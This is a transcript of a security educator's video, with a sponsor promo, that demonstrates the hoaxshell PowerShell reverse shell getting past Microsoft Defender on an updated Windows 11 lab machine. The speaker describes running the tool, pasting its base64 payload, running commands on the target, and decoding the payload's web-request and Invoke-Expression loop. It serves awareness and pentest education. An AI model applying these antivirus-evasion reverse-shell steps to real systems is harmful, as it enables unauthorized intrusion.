Reverse Shell UNDETECTED by Microsoft Defender (hoaxshell)

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

how easily can you bypass the native default Microsoft Defender antivirus that is freely available and installed on just about every single Windows operating system host device and endpoint we've been on a little bit of a kick in the recent videos just trying to see what command and control Frameworks or what offensive tooling might be able to circumvent and evade and get past that antivirus and that is the trend I want to keep rolling on in this video where we get to experiment and play with hoax shell but before we dive in I do want to give some quick love and support and a generous thank you to the sponsor of this video and we'll roll the promo Plex track is the Premier cyber security reporting and collaboration platform that makes penetration testers red teamers and cyber security teams more efficient effective and proactive with Plex track you can eliminate the dull and boring drudgery of report writing so you can focus on what's really important hacking the engagement the assessment and the campaign and it's not just for offense Plex track is a collaboration portal but between both red and blue teams to facilitate effective purple teaming and faster remediation while coordinating between multiple team members you easily aggregate findings pull in reusable content from write-up databases and content libraries and track and measure progress in real time you can import assets from common CSV files nmap nessus and many of your other favorite tools Plex track boasts 25 plus Integrations and that list is always growing you can do even more with Plex tracks run books with scripts mapped to the miter attack framework or plans from Atomic red team in sight or assessments built off of the CIS controls and benchmarks and of course show the impact with Plex tracks analytics and visualizations customize your reports with your team's logo and details and with the single click export your report and send it off to the client spend more time hacking and less time reporting learn how you can boost your team's efficiency by 30 percent and cut reporting Time by up to 65 percent with Plex track seriously check them out I have great colleagues and peers that use Plex track every day for reporting sign up for a demo and claim your free month of Plex track right now at https jh.io Plex track huge thanks to Plex track for sponsoring this video alrighty so I am inside of my Kali Linux virtual machine and I'm here on GitHub checking out this repository under this user for hoax shell now this is pretty slick I've seen this around on the twitterverse and I would recommend if folks aren't tracking on Twitter there's some super cool offensive security hey pen testing ethical hacking and a whole lot of blue team instant response and threat Intel you can track down on there but this is hoaxhawkeshell is an unconventional Windows reverse shell currently undetected by Microsoft Defender and possibly other AV Solutions solely based on HTTP or https traffic tool is easy to use it generates its own Powershell payload and supports encryption with SSL now it has been a little bit of time since this has been released you can see some commits dating back to about three months ago however some might very just well be hey one month ago or 27 days 28 days whatever the case may be so we will kick the tires and go see does this stick up to the test is this still bypassing Microsoft Defender even on an updated Windows 11 machine looks like it has been tested on fully updated Windows 11 Enterprise Windows Server 2016 Data Center and Windows 10 Pro boxes you can see some video and screenshots down below but we will just go ahead and play with it there's some screenshots but hey let's go ahead and roll through the install should be super simple should be pretty easy hey we clone the repository go ahead and install the requirements and then just run this thing it's a nice and easy python script so let's fire up a command line and what I will do is just go ahead and slap in that git clone command I will end up changing this to be using the git schema so it does SSH or whatever the shenanigans it tends to do and I zoomed in way too much but there we go we can go ahead and clone this and now I should have the hoax shell folder here which I do and this is all the stuff that we just saw previously But ultimately we need to go ahead and install everything out of the requirements.txt file we'll use pip to do that but let me just show you what that thing is I'll cut out those requirements looks like it just needs IPython so okay pretty simple let me go ahead and use pip 3 and I'll use install Tac R so we know that we're going to be retrieving a requirements.txt file and I'll go ahead and pass that in reading that file and it should just go ahead and install stuff for me nice and easy okay now that that has finished we should be able to go ahead and play with the Hope shell but we do need to mark it as executable and we'll go ahead and work with it if you want to trust this thing you know actually validate it's not going to be running any crazy malicious code here on your machine you can fire up the source code open in a text editor and see what this thing does scroll through it take a look at some of the sweetness a whole lot of awesome argument parsing um assuming there's going to be some pretty dope ASCII art and I like that function chill hey just pass don't do anything but honestly hey super quick grocery look look I'm not gonna see any Fork bombs or RM attack RF or shred in here like this is this is all good let's go ahead and run this thing uh did I just Mark that as executable I believe I just did yeah Okay cool so let's go ahead and run hope shell all right looks like we need to provide a local host IP address we can supply that with Tac s so let me grab my current IP address I am working inside of my virtual machine so my current IP is 192.168.11138 we can go and grab that and let's see what else I need to provide after I give it that Tech s whoa not a whole lot more looks like I've spat out this giant Powershell syntax all this encoded command the payload here and this is just as I mentioned Powershell Tac e just that encoded syntax and it is all base64 so let's go ahead and scroll down and grab all this thing now what I want to do is go ahead and grab a virtual machine I'll spin up the previous windows 11 machine I was just using playing with havoc in the command and control framework because that is a fully up to date Windows 11 box I'll let this thing Boot and get back to you all right looks like I am here greeted at my login screen we'll go ahead and log in and just to drive the point home here I'll go ahead and move my face you'll notice this is Windows 11 Enterprise evaluation if I go ahead and just for the sake of showcasing we are on the absolute latest updates I'll go ahead and check out the Windows update settings here if I go ahead and check for updates there should be none available for me because we are retrieving working with absolutely rolling with the latest updates there it is okay you're up to date absolutely last checked just now so we can also verify that the virus and threat protection Microsoft Defender is Alive and Kicking here I'll go ahead and scroll down to the virus and threat protection settings you can see real-time protection is on I do have Cloud delivery protection and the autumn automatic sample submission and all these things kind of turned off if just so they don't rat out you know hey we're playing and poking around with some of this offensive tooling now I'll go ahead and actually move this to the side and we'll get Kali Linux rolling on the other side just as well and I'll admit here this is Uncharted Territory for me I don't know if this will succeed or not but we've got hope shell waiting on the side and let's fire up a Powershell commandlet uh just open up uh Windows terminal is fine yep and let's see if I can zoom in on this as it starts up Powershell I said command there I should have been session and now I'm slapping all this in the moment I hit enter fingers crossed oh look at that oh that's awesome payload execution verified stabilizing the command prompt and hope shell has a shell well dang Prime back open this uh Windows Defender box or inside the windows 11 virtual machine Windows Defender is still hey absolutely letting it spin right by so sweet let's go ahead and check out what Cali Linux has over here for us uh we can see hope shell has got this and what am I doing well I guess I can run help and look that's it man you can run any payloads or honestly now we've got Powershell like here I can control L to clear the screen uh do I have like a limited command size is that why it's not expanding that out it might be probably it's trying to detect the screen size of the terminal width just as I was working with it earlier but I can PWD I can go ahead and run who am I I can net whatever net user I have a reverse shell I I am interacting on that Target and Windows Defender is none the wiser kind of slick hey sorry uh John from the future here didn't want to interrupt but I was going through editing and I was thinking you know there were a couple comments in the Havoc C2 framework video where folks just weren't really digging the fact that hey Cloud protection and some of the other Defender settings were turned off while testing I guess that's not a good enough litmus tester thinking yo maybe Defender doesn't have all the juice when it's not getting that extra support so let's go ahead and try to run this just as well with uh virus and threat protection back open and actually turning those settings on I've not done this so I don't know if this will work but uh it's worth a try let's go ahead and toggle Cloud protection back on automatic sample submission sure whatever tamper protection yeah okay okay there are no exclusions so uh again this should be everything um and let's kick the tires here I'm gonna go ahead and spin up hope shell uh now we have a big giant Powershell payload and let's grab this syntax I'll right click and copy fire up Powershell and let's slap it in and see if we get our callback scroll down here so hook shelf should hopefully get something and we'll see I'll move my face out of the way in case we get a Defender alert slapping this in hitting enter still comes through dig it let's see can I run some commands go who am I yep good old net user yep Goodall PWD obviously if I were to do some shenanigans that Defender probably wouldn't like oh hey you can see even on this shell the script is getting some amsi hey invoke mimikats bad but we still have our reverse shell so kind of digging that super cool looks all good even with all those buttons toggles switched on Defender letting it cruise by see ya so that's ultimately everything that I kind of wanted to Showcase here but now that we're here like cool we lit off the fireworks might as well kind of pour in and see what this payload's all about this is kind of slick I want to grab that base64 and I could very well just grab this on the Kali Linux machine itself uh but let's zoom in here create a new little terminal here and let's just make like oh what is that payload dot b64 pacing in all this base64 we can try and go ahead and decode this I'll use base64 attack D on payload base64 and uh let me go ahead and tee that out to another file so this is like decoded dot PS1 we're going to assume hey it's probably Powershell syntax right so let's fire that thing up oh and this is it looks like we have okay what we're calling back to um this is my IP address as I entered it on port 8080 so it just shows that on its own that's defined is this s variable in Powershell I'm going to assume this I is maybe for an identifier looks like a guide maybe I could totally be wrong there but p is actually going to end up using HTTP as sort of a schema and then v as a variable is defined we invoke web requests use basic parsing URI at my specific HTTP host and Port slash fc0b61 Etc hosting all of this here for me and it looks like the headers is where it might be actually retrieving some interesting stuff given a unique identifier or that I value there now if I go ahead and check out what this Loop is doing looks like we are in an infinite loop with while true dollar sign C we continue to retrieve new portions here and this is interesting you'll note hey that very very first syntax or the hex values defined for our I variable looks like it just gets the shell and then this one here is the second portion continuing to retrieve data but we get the content okay if there is no result from it if it's not equal to none then we go ahead and try and invoke expression or IEX as that Powershell command with aliases uh error action is s so I'm going to assume that silently continue but this is kind of weird to me I'm not quite sure what we're looking at with some of those random letters and characters that's wild what does that end up doing iexc being the result of it and then there's nonsense here is that part of its detection portion or it looks like there's supposed to be half of a command here it's doing another request right because it needs to use something being set to I and then the body which we retrieve and then the get bites and join sleep for just under a second here interesting unless this is supposed to be part of the loop that it has the closing curly brace and that's part of the if statement so that noise and nonsense here might just be a portion that it's using to get data in and out Am I Wrong am I stupid I mean I know I am but joins it all together e and r are e and r retrieved no that must be from what the server responds with hope she'll actually responds that IEX invoke expression is going to end up creating some other variables that will be end up being used as part of the response here so let's go ahead and take a look at what this thing does I was just scrolling through this source code moments ago to be able to you know kind of see but now I'm just super curious you could use an encrypted child course if you wanted to with your own hey silly self-signed certificate or anything but look at all these arguments you could give it yeah you could do so much more print Banner it's got that cool stuff the nice little colors there help message that's what we ran when we saw our help command but encode payload is just you know how it's defined what is that print payload raw going to give me is it something that might be different from what we end up seeing if I use help again what is raw payload oh okay so this looks a little bit better maybe I did something weird with my base64 or assumption and against Let's uh try and add some new lines after all of these semicolons and let's set this syntax to Powershell so now we're doing everything that we've seen previously with a little bit more sense made to it and we invoke expression as we did before but retrieve as outstring given the input object R and then communicate right back to it posting the data back huh was my base64 weird because hey I copied it off of like Windows or something uh I don't know we don't need to beautify this honestly that that's all that I wanted to showcase builds up the uuid has a certain amount of pulse oh that's kind of slick and we could kind of poke around and explore if we really wanted to but I won't bore you going through all of this right here right now um this is again Uncharted Territory for me I did want to validate Hey look it's still cruising right past Windows Defender and that is pretty slick we got a little bit of the knowledge know-how as to how this was working I dig that move on mate uh but that's so slick not something that is detected by Windows Defender uh the default native antivirus even on Windows 11 as fully updated fully patched got everything already installed between you know updates and new things to pull down it's all all done look at that cool super quick video hey just wanted to Showcase this in case you haven't heard of Hope shell that might be something fun to play with at the moment undetected by Microsoft Defender maybe some other antivirus Solutions are picking it up I don't know a being that power cell syntax and sort of that hey back and forth thing it's like cool not selling an executable that you could just slap into virustotal or run through any other sandbox or analyzer well it's doing its thing with with python and Powershell just hand in data back and forth slick wanted to raise awareness wanted to bring the education to you and I thought maybe that's some cool nice little fit in for stuff that we do for ethical hacking penetration testing red teaming Etc with that said I do want to give some a lot more of that love to Plex track huge thanks for sponsoring this video and I'm looking forward to the next one where we can jam together thanks so much for watching everybody see in the next video

Info

Channel: John Hammond

Views: 155,900

Rating: undefined out of 5

Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners

Id: fgSARG82TJY

Channel Id: undefined

Length: 17min 43sec (1063 seconds)

Published: Tue Oct 11 2022